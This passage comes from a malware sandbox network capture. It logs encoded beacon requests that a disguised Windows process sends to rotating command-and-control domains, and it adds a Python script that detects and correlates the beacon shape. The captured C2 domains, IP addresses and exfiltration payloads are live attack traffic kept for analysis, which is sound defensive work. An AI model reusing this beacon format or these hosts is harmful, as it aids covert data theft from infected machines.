                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 76 34 4e 4a 30 79 52 74 4b 7a 76 62 2b 51 33 49 43 52 6f 4f 6c 4b 6c 2f 31 7a 48 78 33 6f 79 4a 57 74 36 70 58 30 3d
                                                                                                                                                  Data Ascii: W638b4U=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842v4NJ0yRtKzvb+Q3ICRoOlKl/1zHx3oyJWt6pX0=


                                                                                                                                                   Session ID: 22   Source IP: 192.168.2.5   Source Port: 50001   Destination IP: 128.65.195.180   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:07.024276972 CET   Bytes transferred: 656   Direction: OUT
                                                                                                                                                   POST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 6d 64 76 6d 37 77 67 48 4a 62 54 31 39 4b 33 41 6a 73 46 35 51 2b 74 35 4b 36 31 36 77 54 42 63 51 50 4c 6e 65 54
                                                                                                                                                  Data Ascii: W638b4U=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFmdvm7wgHJbT19K3AjsF5Q+t5K616wTBcQPLneT


                                                                                                                                                   Session ID: 23   Source IP: 192.168.2.5   Source Port: 50002   Destination IP: 128.65.195.180   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:09.579377890 CET   Bytes transferred: 1673   Direction: OUT
                                                                                                                                                   POST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 71 52 66 35 63 36 47 69 42 67 4c 33 36 36 76 6c 33 69 33 41 45 32 61 6e 68 72 72 33 58 7a 42 49 73 71 6e 2b 4f 61 7a 59 46 69 51 62 52 65 46 51 7a 4e 32 30 59 77 67 53 42 5a 2f 4e 71 2f 35 69 66 4e 49 46 43 6a 42 4b 6d 53 6c 44 78 72 50 4b 6b 79 76 4a 4c 43 4b 36 32 63 62 4d 48 73 6e 37 54 6f 32 6e 54 50 73 77 4e 70 43 4f 79 7a 67 6e 45 79 36 63 4f 72 66 74 69 6d 58 33 50 58 41 57 6c 50 72 6c 51 57 52 38 75 5a 79 6e 42 62 2b 58 50 73 7a 50 70 31 4e 4c 4c 6e 54 37 6b 77 43 78 [TRUNCATED]
                                                                                                                                                   Data Ascii: W638b4U=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GiBgL366vl3i3AE2anhrr3XzBIsqn+OazYFiQbReFQzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyzgnEy6cOrftimX3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCx [TRUNCATED]


                                                                                                                                                   Session ID: 24   Source IP: 192.168.2.5   Source Port: 50003   Destination IP: 128.65.195.180   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:12.122459888 CET   Bytes transferred: 381   Direction: OUT
                                                                                                                                                   GET /293d/?W638b4U=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGTfIU/JrlV2z9a9IQeyVbD4LqpyZAtBKJ4EaDgMR1jS91tA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:17.271413088 CET   Bytes transferred: 458   Direction: IN
                                                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:17 GMT
                                                                                                                                                  Server: Apache/2.4.25 (Debian)
                                                                                                                                                  Content-Length: 278
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                                                                                   Session ID: 25   Source IP: 192.168.2.5   Source Port: 50004   Destination IP: 217.70.184.50   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:22.481664896 CET   Bytes transferred: 651   Direction: OUT
                                                                                                                                                   POST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 6e 48 4b 67 7a 39 79 41 6a 55 53 66 71 44 4a 2b 41 6b 53 77 53 42 31 70 70 30 73 35 4b 47 73 49 4e 66 66 2f 6a 63 3d
                                                                                                                                                  Data Ascii: W638b4U=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynunHKgz9yAjUSfqDJ+AkSwSB1pp0s5KGsINff/jc=
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:23.281769991 CET   Bytes transferred: 608   Direction: IN
                                                                                                                                                   HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:23 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0
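The sessions above all carry the same request shape regardless of host: a single four-character path segment (/1iqa/, /293d/, /vdvc/), the fixed Chrome/33.0.1726.0 User-Agent, a POST whose entire form body is one W638b4U=<base64 blob> pair, and a GET whose query repeats that pair and appends a short second one (Xll=50hLc0Hhy), while the servers answer 404 or 501 because most of the contacted domains are decoys. The following Python is an added example, not code from the Joe Sandbox report: it parses raw HTTP requests copied from sessions 20, 21 and 25, checks them against that shape, and correlates the form-field name across hosts so the domain rotation stands out. The benign control request and its host www.example.com are constructed for the example, and the field names and paths it keys on are the ones in this capture, not a general signature.

```python
"""Added example, not code from the Joe Sandbox report: parse the raw HTTP
requests captured above and flag the beacon shape they share.

The three malicious requests are copied from sessions 20, 21 and 25; the
benign control request and its host www.example.com are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# The User-Agent carried by every request in the capture above.
CAPTURED_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36")
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")       # /1iqa/, /293d/, /vdvc/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/ ]+={0,2}$")  # base64 blob; parse_qsl turns '+' into ' '


def parse_request(raw):
    """Split one raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def beacon_fields(req):
    """Return (host, path, field_name) when the request has the captured beacon
    shape, else None: the fixed UA, one four-character path segment, and a body
    (POST) or query (GET) whose first pair is <name>=<base64 blob>; the GET
    additionally carries exactly one very short trailing pair (Xll=50hLc0Hhy above)."""
    if req["headers"].get("user-agent") != CAPTURED_UA:
        return None
    url = urlsplit(req["target"])
    if not PATH_RE.match(url.path):
        return None
    if req["method"] == "POST":
        if "application/x-www-form-urlencoded" not in req["headers"].get("content-type", ""):
            return None
        pairs = parse_qsl(req["body"], keep_blank_values=True)
        if len(pairs) != 1:
            return None
    elif req["method"] == "GET":
        pairs = parse_qsl(url.query, keep_blank_values=True)
        if len(pairs) != 2 or len(pairs[1][0]) > 4 or len(pairs[1][1]) > 12:
            return None
    else:
        return None
    if not BLOB_RE.match(pairs[0][1]):
        return None
    return (req["headers"].get("host", ""), url.path, pairs[0][0])


def correlate(raw_requests):
    """Map each beacon field name to the sorted hosts it was sent to. One name
    reused against several hosts is the domain rotation visible in the capture."""
    hosts_by_name = defaultdict(set)
    for raw in raw_requests:
        hit = beacon_fields(parse_request(raw))
        if hit:
            host, _path, name = hit
            hosts_by_name[name].add(host)
    return {name: sorted(hosts) for name, hosts in hosts_by_name.items()}


def raw_request(*lines):
    """Join request lines with CRLF; end with "", "" for an empty body."""
    return "\r\n".join(lines)


SAMPLE_REQUESTS = [
    # Session 20 above (headers trimmed to the ones the checks use).
    raw_request("GET /1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhy HTTP/1.1",
                "Host: www.kdtzhb.top", "User-Agent: " + CAPTURED_UA, "", ""),
    # Session 21 above.
    raw_request("POST /293d/ HTTP/1.1", "Content-Type: application/x-www-form-urlencoded",
                "Host: www.evoo.website", "User-Agent: " + CAPTURED_UA, "",
                "W638b4U=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842v4NJ0yRtKzvb+Q3ICRoOlKl/1zHx3oyJWt6pX0="),
    # Session 25 above.
    raw_request("POST /vdvc/ HTTP/1.1", "Content-Type: application/x-www-form-urlencoded",
                "Host: www.astorg-group.info", "User-Agent: " + CAPTURED_UA, "",
                "W638b4U=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynunHKgz9yAjUSfqDJ+AkSwSB1pp0s5KGsINff/jc="),
    # Constructed benign control: an ordinary browser request that must not be flagged.
    raw_request("GET /login?next=%2Fhome HTTP/1.1", "Host: www.example.com",
                "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0", "", ""),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_REQUESTS))
```

Run stand-alone it prints one entry, W638b4U mapped to the three hosts. In a real deployment the field name is not a stable indicator (it changes between builds), so the shape check in beacon_fields does the detection and correlate only groups what it found; a name that appears against several unrelated hosts within seconds, each answering 404 or 501 as above, is the rotation through decoy domains rather than a browser visiting a site.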


                                                                                                                                                   Session ID: 26   Source IP: 192.168.2.5   Source Port: 50005   Destination IP: 217.70.184.50   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:25.022552013 CET   Bytes transferred: 671   Direction: OUT
                                                                                                                                                   POST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 74 4e 35 36 38 62 6f 36 6e 46 53 75 50 76 68 30 4c 73 50 6e 63 72 59 6f 54 78 73 6a 70 36 65 30 6b 4b 6e 32 64 64
                                                                                                                                                  Data Ascii: W638b4U=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jytN568bo6nFSuPvh0LsPncrYoTxsjp6e0kKn2dd
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:25.854955912 CET | Bytes transferred: 608 | Direction: IN
                                                                                                                                                   HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:25 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                   Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50006 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 4068 | Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:27.567817926 CET | Bytes transferred: 1688 | Direction: OUT
                                                                                                                                                   POST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 55 73 59 71 7a 6b 2f 67 77 43 68 41 42 66 37 38 55 56 78 63 76 38 58 6f 79 61 6d 6a 7a 58 47 30 73 59 64 74 50 68 36 43 41 4e 50 6c 38 2b 71 6a 74 51 37 45 2b 78 51 48 42 74 43 78 67 31 47 36 52 48 64 63 34 34 48 32 34 6c 31 57 46 44 47 49 6f 4b 68 57 59 38 74 63 66 53 33 35 4e 32 4b 55 66 74 6c 33 64 6a 2f 34 63 41 50 7a 75 30 36 38 6d 34 39 63 6e 69 72 69 4b 73 43 77 75 7a 4f 77 2b 61 36 32 6a 51 34 39 42 48 59 70 48 58 59 32 49 4a 74 61 6b 50 59 74 5a 52 47 54 2b 2b 6f 48 [TRUNCATED]
                                                                                                                                                   Data Ascii: W638b4U= [TRUNCATED]
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:28.371813059 CET | Bytes transferred: 608 | Direction: IN
                                                                                                                                                   HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:28 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
